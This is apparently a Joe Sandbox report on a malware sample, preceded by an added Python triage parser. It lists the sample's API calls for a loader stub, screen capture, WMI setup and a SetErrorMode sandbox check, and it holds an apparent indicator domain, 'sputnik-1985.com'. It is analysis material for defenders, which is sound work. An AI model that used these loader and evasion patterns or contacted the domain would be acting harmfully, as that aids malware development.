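The function above is the one a reverser would open first: it lives at 0x02100000 in a region the report marks "based on PE: false" (memory the sample allocated itself, not a mapped image), and its graph runs VirtualAlloc, VirtualProtect, VirtualFree and LoadLibraryA with the string kernel32.dll nearby, which is the shape of an unpacking/loader stub. The SetErrorMode(0x400) / SetErrorMode(0) pair listed further down in this section is the other call sequence worth a second look. The Python below is an added example, not part of the Joe Sandbox report or its IDA plugin: it parses function blocks in the listing layout used on this page and applies those two triage checks. The sample text is abridged from this page (hashes shortened, the last block's hash line is a constructed placeholder), and reading the SetErrorMode round-trip as a sandbox check is an assumption about a well-known pattern, not something the report states.

```python
import re
from dataclasses import dataclass, field

# Constructed input: three function blocks in the layout Joe Sandbox uses for its
# IDA-plugin listings, abridged from this report (CFG text trimmed, hashes
# shortened, last hash line is a placeholder) so the parser runs offline.
SAMPLE_REPORT = """\
control_flow_graph 492 210003c-2100047 494 210004c-2100263 call 2100a3f VirtualAlloc 515 21002ce-21003c2 VirtualProtect 523 2100439-21004b8 VirtualFree 534 21004e3-2100505 LoadLibraryA
APIs
• VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0210024D
Strings
Memory Dump Source
• Source File: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
Similarity
• API ID: AllocVirtual
• String ID: cess$kernel32.dll
• Instruction Fuzzy Hash: F4525974A01229DF
control_flow_graph 765 40e3d3-40e540 CoInitializeEx * 2
APIs
• CoInitializeEx.OLE32(00000000,00000002), ref: 0040E3D7
• CoInitializeEx.COMBASE(00000000,00000002), ref: 0040E51A
Memory Dump Source
• Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: Initialize
• String ID:
• Instruction Fuzzy Hash: CC41FAB4C10B40AF
control_flow_graph 779 2100e0f-2100e24 SetErrorMode * 2 780 2100e26 779->780 781 2100e2b-2100e2c 779->781 780->781
APIs
• SetErrorMode.KERNELBASE(00000400,?,?,02100223,?,?), ref: 02100E19
• SetErrorMode.KERNELBASE(00000000,?,?,02100223,?,?), ref: 02100E1E
Memory Dump Source
• Source File: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
Similarity
• Instruction Fuzzy Hash: CONSTRUCTED0
"""

API_RE = re.compile(r"^• (\w+)\.(\w+)\(([^)]*)\), ref: ([0-9A-Fa-f]+)$")
SRC_RE = re.compile(r"Offset: ([0-9A-Fa-f]+), based on PE: (true|false)")
# API names in the CFG text are the only CamelCase tokens; hex labels are lowercase.
CFG_API_RE = re.compile(r"\b([A-Z][A-Za-z0-9]*[a-z][A-Za-z0-9]*)\b")
LOADER_APIS = {"VirtualAlloc", "VirtualProtect", "VirtualFree",
               "LoadLibraryA", "LoadLibraryW", "GetProcAddress"}


@dataclass
class Function:
    offset: str = ""
    pe_backed: bool = True
    api_calls: list = field(default_factory=list)   # (module, name, [args])
    cfg_apis: set = field(default_factory=set)
    strings: list = field(default_factory=list)
    fuzzy_hash: str = ""


def parse_report(text):
    """Split the listing into Function records; each block ends at its fuzzy-hash line."""
    funcs, cur = [], Function()
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("control_flow_graph "):
            cur.cfg_apis = set(CFG_API_RE.findall(line))
            continue
        m = API_RE.match(line)
        if m:
            name, module, args, _ref = m.groups()
            cur.api_calls.append((module, name, args.split(",")))
            continue
        m = SRC_RE.search(line)
        if m:
            cur.offset, cur.pe_backed = m.group(1), m.group(2) == "true"
            continue
        if line.startswith("• String ID:"):
            cur.strings = [s for s in line[len("• String ID:"):].strip().split("$") if s]
            continue
        if line.startswith("• Instruction Fuzzy Hash:"):
            cur.fuzzy_hash = line.split(":", 1)[1].strip()
            funcs.append(cur)
            cur = Function()
    return funcs


def triage(funcs):
    """Two heuristics over the parsed blocks; returns (offset, label, evidence) tuples."""
    findings = []
    for f in funcs:
        names = {n for _, n, _ in f.api_calls} | f.cfg_apis
        loader_hits = sorted(names & LOADER_APIS)
        # 1. Allocation/protection/import-resolution APIs reached from memory that is
        #    not backed by a mapped PE image: the shape of an unpacking/loader stub.
        if not f.pe_backed and loader_hits:
            dlls = [s for s in f.strings if ".dll" in s.lower()]
            findings.append((f.offset, "loader stub in unbacked memory", loader_hits + dlls))
        # 2. SetErrorMode(x != 0) followed by SetErrorMode(0): the second call returns
        #    the previous mode, and comparing it is a known sandbox/emulator check
        #    (assumption about the branch after the pair; the report only lists the calls).
        sem = [a for _, n, a in f.api_calls if n == "SetErrorMode"]
        if len(sem) >= 2 and int(sem[0][0], 16) != 0 and int(sem[1][0], 16) == 0:
            findings.append((f.offset, "SetErrorMode round-trip (sandbox-check pattern)", [sem[0][0]]))
    return findings


if __name__ == "__main__":
    for offset, label, evidence in triage(parse_report(SAMPLE_REPORT)):
        print(f"{offset}: {label}: {', '.join(evidence)}")
```

The block boundary is the "Instruction Fuzzy Hash" line because it is the last field of every function block in this layout; the "Executed / Not Executed" legend and empty "Strings" or "Yara matches" headers are skipped because they carry no per-function data. The CoInitializeEx function at 0x0040E3D3 produces no finding, which is the intended behaviour: it sits in the mapped image and calls nothing on the loader list.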

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 765 40e3d3-40e540 CoInitializeEx * 2
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • CoInitializeEx.OLE32(00000000,00000002), ref: 0040E3D7
                                                                                                                                                                                                                                        • CoInitializeEx.COMBASE(00000000,00000002), ref: 0040E51A
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                         • Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Initialize
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2538663250-0
                                                                                                                                                                                                                                        • Opcode ID: c988e08bd81bdbbbc832e77591d1fe524e628b2a2385e733f966e0820bef1a3a
• Instruction ID: b2aa6f84acc7d50c337c606844e5536a7248dcea6e3e3aabb346ed1b6ad7aec1
• Opcode Fuzzy Hash: c988e08bd81bdbbbc832e77591d1fe524e628b2a2385e733f966e0820bef1a3a
• Instruction Fuzzy Hash: CC41FAB4C10B40AFD370EF3D9A0B7167EB4AB05214F404B2DF9E6966D4E230A4198BD7

Control-flow Graph
control_flow_graph 779 2100e0f-2100e24 SetErrorMode * 2 780 2100e26 779->780 781 2100e2b-2100e2c 779->781 780->781
APIs
• SetErrorMode.KERNELBASE(00000400,?,?,02100223,?,?), ref: 02100E19
• SetErrorMode.KERNELBASE(00000000,?,?,02100223,?,?), ref: 02100E1E
Memory Dump Source
• Source File: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2100000_xNuh0DUJaG.jbxd
Yara matches
Similarity
• API ID: ErrorMode
• String ID:
• API String ID: 2340568224-0
• Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
• Instruction ID: d5591706dddec6dc70c020a45b27ca906bb1356f428d6b1f08c8c78c4e708908
• Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
• Instruction Fuzzy Hash: 05D0123114512877D7002A94DC09BCD7B1CDF09B66F108011FB0DE9080C7B0954046E5

Control-flow Graph
control_flow_graph 839 40df92-40dfdb CoInitializeSecurity
APIs
• CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040DFA4
Memory Dump Source
• Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
Similarity
• API ID: InitializeSecurity
• String ID:
• API String ID: 640775948-0
• Opcode ID: c197b67b38e7a9dfb84c75cb0c47c94d45024fd2fc4afd10e6e7abe74b422134
• Instruction ID: ccd3c5eb67ff0c959232c13284a4feb1b70bc0ce71dfd05ddd5b0dd8dbfc25b4
• Opcode Fuzzy Hash: c197b67b38e7a9dfb84c75cb0c47c94d45024fd2fc4afd10e6e7abe74b422134
• Instruction Fuzzy Hash: AAE04F763843026BE7688B789D57B01228697C5B28F368235F716AF2E5EAB474064909

Control-flow Graph
control_flow_graph 840 40ab12-40ab5b call 441c40 * 2 WSAStartup
APIs
• WSAStartup.WS2_32(00000202), ref: 0040AB46
Memory Dump Source
• Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
Similarity
• API ID: Startup
• String ID:
• API String ID: 724789610-0
• Opcode ID: b187d8107ffde8e05c7d0a09cdfc1bb296f851924af62c815b9bdc52e44f9908
• Instruction ID: 8daa5b18d499817a70b2f557c0c6df6f58e6f2abf740e83111143c9212bc1643
• Opcode Fuzzy Hash: b187d8107ffde8e05c7d0a09cdfc1bb296f851924af62c815b9bdc52e44f9908
• Instruction Fuzzy Hash: 0AE02B7A5D5104BBF2486751FD4FC563616BB4330AB08413DFC185017BD6511426C66A

APIs
• RtlFreeHeap.NTDLL(?,00000000,?,004402AB,?,0040B9C7,00000000,00000001), ref: 0043EB60
Memory Dump Source
• Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
Similarity
• API ID: FreeHeap
• String ID:
• API String ID: 3298025750-0
• Opcode ID: 81edc790b0ddca4267d7eff7df3f20d03a026a9a6739d0257eb6886926d10809
• Instruction ID: 6306fd139b63709815d779222b474fbda691f96f30962fae2caf2063fc0eb5d0
• Opcode Fuzzy Hash: 81edc790b0ddca4267d7eff7df3f20d03a026a9a6739d0257eb6886926d10809
• Instruction Fuzzy Hash: FDD0C931445536FBC6102F28BC06BCB3B94EF497A5F0708A5F540AA075E725DC918AD8

APIs
• GetForegroundWindow.USER32 ref: 004404BF
Memory Dump Source
• Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
Similarity
• API ID: ForegroundWindow
• String ID:
• API String ID: 2020703349-0
• Opcode ID: 6f507deb5e1f19d761a5d5784f4b45f47d149ac39b8a1577dd60edd7b15305f7
• Instruction ID: 7f86c14d6ce35f706de72b94d0a04e46592ace6e5707a2a12f6891b8fa8e10aa
• Opcode Fuzzy Hash: 6f507deb5e1f19d761a5d5784f4b45f47d149ac39b8a1577dd60edd7b15305f7
• Instruction Fuzzy Hash: 15E0E2B9900214DBEB44CF68FC9592933B5EB8B3093040439E202C3362EA34E602CF59

APIs
• RtlAllocateHeap.NTDLL(?,00000000,?,E931068D,004089CF,6W01), ref: 0043EB30
Memory Dump Source
• Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
Similarity
• API ID: AllocateHeap
• String ID:
• API String ID: 1279760036-0
• Opcode ID: 79e8824736e673c164acaa36c8672ab8da0624bb6b492fb9ad0aed697a58ad7a
• Instruction ID: faa30900258afa928b287b4fa720072893bcbdc8cd762d9751037a3417221d58
• Opcode Fuzzy Hash: 79e8824736e673c164acaa36c8672ab8da0624bb6b492fb9ad0aed697a58ad7a
• Instruction Fuzzy Hash: 91C04C31045120ABD5506B15EC05BC63B54DF852A5F020065B105660718660ACC2C698

APIs
• VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 004804B6
Memory Dump Source
• Source File: 00000003.00000002.1541906304.0000000000480000.00000040.00001000.00020000.00000000.sdmp, Offset: 00480000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_480000_xNuh0DUJaG.jbxd
Yara matches
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
• Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
• Instruction ID: 6175ed9e119c1fa8be5b6913f300576b83b0615bc37c480c2bb8ecb1c49c856d
• Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
• Instruction Fuzzy Hash: 1C116C79A40208EFDB01DF98CA85E9CBBF1AF08750F058095FA489B362D335EA50DF80
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2100000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: &$&$($-$/$0$0$1$1$2$4$43A2C7AD89C30672D0632DF0E28DC412$7$8$:$>$>$?$?$@$@$A$B$D$F$H$J$L$N$N$Q$V$X$\$^$`$b$d$f$f$h$h$j$l$n$n$p$q$r$sputnik-1985.com$t$v$x$x$z$|$}$~
                                                                                                                                                                                                                                        • API String ID: 0-3477518189
                                                                                                                                                                                                                                        • Opcode ID: c5d1dad0e18394a26f368b4fdc11b7f874ac40861fef3467ff25af8bb3c0dbef
                                                                                                                                                                                                                                        • Instruction ID: 06f791bbfc6e9ef83a1bd1c61cbcebbad1d7d3ac43852dd20b3f834cf4bced95
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c5d1dad0e18394a26f368b4fdc11b7f874ac40861fef3467ff25af8bb3c0dbef
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5E0251219087D98DDB22C67C8C583DDBFA11B63224F1883DDD1E86B3D6D7B9054ACB62
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: &$&$($-$/$0$0$1$1$2$4$43A2C7AD89C30672D0632DF0E28DC412$7$8$:$>$>$?$?$@$@$A$B$D$F$H$J$L$N$N$Q$V$X$\$^$`$b$d$f$f$h$h$j$l$n$n$p$q$r$sputnik-1985.com$t$v$x$x$z$|$}$~
                                                                                                                                                                                                                                        • API String ID: 0-3477518189
                                                                                                                                                                                                                                        • Opcode ID: c5d1dad0e18394a26f368b4fdc11b7f874ac40861fef3467ff25af8bb3c0dbef
                                                                                                                                                                                                                                        • Instruction ID: 27bd2a0d4c2ee2dbe7fab43400867feab0dee6ac78a78b22b0fd1ff9dbe20428
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c5d1dad0e18394a26f368b4fdc11b7f874ac40861fef3467ff25af8bb3c0dbef
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 45026021D087D989DB22C67C8C483CDBFA11B63324F4843EDD5E86B3D6D6B90946CB66
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2100000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: %$+$0$3$9$:$<$=$>$A$C$D$E$G$I$K$L$M$a$a$c$c$e$e$g$g$i$i$k$k$m$m$n$o$o$q$s$u$w$x$y${$}
                                                                                                                                                                                                                                        • API String ID: 0-1785674967
                                                                                                                                                                                                                                        • Opcode ID: 0e20f868d951b71e29e37dcac279c8b11e3bc4ef153ff36d24d69365c9a94d1d
                                                                                                                                                                                                                                        • Instruction ID: f5b7b5b76bc1283b813f01dfb8048a88cf44e4624b73e5e1f204a807c6766b69
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0e20f868d951b71e29e37dcac279c8b11e3bc4ef153ff36d24d69365c9a94d1d
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 75F161319086E98ADB36CA3C8C443DDBFA25F52324F0947D9D0A96B3D2C7754B86CB61
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: %$+$0$3$9$:$<$=$>$A$C$D$E$G$I$K$L$M$a$a$c$c$e$e$g$g$i$i$k$k$m$m$n$o$o$q$s$u$w$x$y${$}
                                                                                                                                                                                                                                        • API String ID: 0-1785674967
                                                                                                                                                                                                                                        • Opcode ID: 2f73bd405479f8443e137748fc13915d6267971bf3abd56322ba3364d03874fc
                                                                                                                                                                                                                                        • Instruction ID: 5a335782380f72e06434a0b7d1c84293c6c1cbd051fad8399b30b8532d7f13f9
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2f73bd405479f8443e137748fc13915d6267971bf3abd56322ba3364d03874fc
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0EF170319086E98ADB22C63C8C443DDBFB15B56324F0847D9D0A96B3D2C7794F86CB66
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2100000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: $$*$-$1$2$4$5$7$<$=$=$=$F$F$G$H$I$O$S$S$T$U$Y$Z$]$_$c$e$f$i$i$j$j$r$s$t$w$x${$~
                                                                                                                                                                                                                                        • API String ID: 0-3597792095
                                                                                                                                                                                                                                        • Opcode ID: c3789e24d09f43a8b0542d61fba22105114c5098dcea2457330ee2163c950db7
                                                                                                                                                                                                                                        • Instruction ID: 32d01b67cc353d10cde139d5793501b7efac64c1f39d8d77eeb7cab383b85d69
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c3789e24d09f43a8b0542d61fba22105114c5098dcea2457330ee2163c950db7
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 55225C219087EA89DB32C67C8C483CDBFA15B67224F1843D9D4F86B3D6C7750A46CB66
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: $$*$-$1$2$4$5$7$<$=$=$=$F$F$G$H$I$O$S$S$T$U$Y$Z$]$_$c$e$f$i$i$j$j$r$s$t$w$x${$~
                                                                                                                                                                                                                                        • API String ID: 0-3597792095
                                                                                                                                                                                                                                        • Opcode ID: f86ff687baa644721faa94586d0f4356f2d95a52b60ef36798eae4a41bc52f90
                                                                                                                                                                                                                                        • Instruction ID: be7a992d2d4842197a1748c1c2319ac7c28ec811ade833faf29c06d267706092
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f86ff687baa644721faa94586d0f4356f2d95a52b60ef36798eae4a41bc52f90
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E8224F219087EA89DB32C67C8C483CDBFA15B67224F1843D9D4F86B3D6C7750A46CB66
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • CoCreateInstance.COMBASE(CDCCD3E7,00000000,00000001,?,00000000), ref: 0213BF33
                                                                                                                                                                                                                                        • SysAllocString.OLEAUT32(37C935C6), ref: 0213BFAD
                                                                                                                                                                                                                                        • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 0213BFEB
                                                                                                                                                                                                                                        • SysAllocString.OLEAUT32(37C935C6), ref: 0213C050
                                                                                                                                                                                                                                        • SysAllocString.OLEAUT32(37C935C6), ref: 0213C137
                                                                                                                                                                                                                                        • VariantInit.OLEAUT32(?), ref: 0213C1A5
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2100000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: AllocString$BlanketCreateInitInstanceProxyVariant
                                                                                                                                                                                                                                        • String ID: M$96$:;$%$F*R($[&h$$e?^$k"@ $n:T8$#~|$#~|
                                                                                                                                                                                                                                        • API String ID: 65563702-2807872674
                                                                                                                                                                                                                                        • Opcode ID: 9f1f51344e39299604904236268e70905638ee0f88f663c1ee43faa23c8ba667
                                                                                                                                                                                                                                        • Instruction ID: 0cd05f757dc3eed905580ea7652814695fe187d5ea0e63938db7464b1f23f01d
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9f1f51344e39299604904236268e70905638ee0f88f663c1ee43faa23c8ba667
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3652E0726483408BD724CF28C8917ABFBE2EFC5314F188A2DE5959B391D775D806CB92
APIs
• GetDC.USER32(00000000), ref: 00436989
• GetSystemMetrics.USER32(0000004C), ref: 00436999
• GetSystemMetrics.USER32(0000004D), ref: 004369A1
• GetCurrentObject.GDI32(00000000,00000007), ref: 004369AA
• GetObjectW.GDI32(00000000,00000018,?), ref: 004369BA
• DeleteObject.GDI32(00000000), ref: 004369C1
• CreateCompatibleDC.GDI32(00000000), ref: 004369D0
• CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 004369DB
• SelectObject.GDI32(00000000,00000000), ref: 004369E7
• BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,00CC0020), ref: 00436A0A
Strings
Memory Dump Source
• Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
Similarity
• API ID: Object$CompatibleCreateMetricsSystem$BitmapCurrentDeleteSelect
• String ID: Y
• API String ID: 1298755333-3233089245
APIs
• RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000), ref: 004251AA
• RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000), ref: 00425243
Strings
Memory Dump Source
• Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
Similarity
• API ID: EnvironmentExpandStrings
• String ID: +$e$+$e$%\)R$,X*^$.T'j$1D6Z$:@&F$?P:V$C`<f$XY$]RB
• API String ID: 237503144-2846770461
APIs
• FreeLibrary.KERNEL32(?), ref: 00419CE7
• FreeLibrary.KERNEL32(?), ref: 00419D24
  • Part of subcall function 004402C0: LdrInitializeThunk.NTDLL(0044316E,00000002,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 004402EE
Strings
Memory Dump Source
• Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
Similarity
• API ID: FreeLibrary$InitializeThunk
• String ID: ~|$SP$if$Mw$pv$tj$vt
• API String ID: 764372645-2706247287
Strings
Memory Dump Source
• Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
Similarity
• API ID:
• String ID: $@7F$(X#^$+\1R$-T,j$2E1G$4D2Z$8I>K$T`Sf$Wdz$&$$qs$uVw
• API String ID: 0-2419925205
Strings
Memory Dump Source
• Source File: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2100000_xNuh0DUJaG.jbxd
Yara matches
Similarity
• API ID:
• String ID: $@7F$(X#^$+\1R$-T,j$2E1G$4D2Z$8I>K$T`Sf$Wdz$&$$qs$uVw
• API String ID: 0-2419925205
APIs
Strings
Memory Dump Source
• Source File: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2100000_xNuh0DUJaG.jbxd
Yara matches
Similarity
• API ID: FreeLibrary
• String ID: ~|$SP$if$pv$tj$vt
• API String ID: 3664257935-1422159894
Strings
Memory Dump Source
• Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
Similarity
• API ID:
• String ID: 5&'d$O$~
• API String ID: 0-1622812124
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                          • Part of subcall function 02136BE7: GetDC.USER32(00000000), ref: 02136BF0
                                                                                                                                                                                                                                          • Part of subcall function 02136BE7: GetCurrentObject.GDI32(00000000,00000007), ref: 02136C11
                                                                                                                                                                                                                                          • Part of subcall function 02136BE7: GetObjectW.GDI32(00000000,00000018,?), ref: 02136C21
                                                                                                                                                                                                                                          • Part of subcall function 02136BE7: DeleteObject.GDI32(00000000), ref: 02136C28
                                                                                                                                                                                                                                          • Part of subcall function 02136BE7: CreateCompatibleDC.GDI32(00000000), ref: 02136C37
                                                                                                                                                                                                                                          • Part of subcall function 02136BE7: CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 02136C42
                                                                                                                                                                                                                                          • Part of subcall function 02136BE7: SelectObject.GDI32(00000000,00000000), ref: 02136C4E
